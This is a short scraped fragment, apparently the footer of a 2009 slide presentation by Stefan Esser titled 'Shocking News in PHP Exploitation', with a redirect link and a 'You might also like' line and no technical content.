http://www.sektioneins.com

Stefan Esser Shocking News in PHP Exploitation November 2009 59

You might also like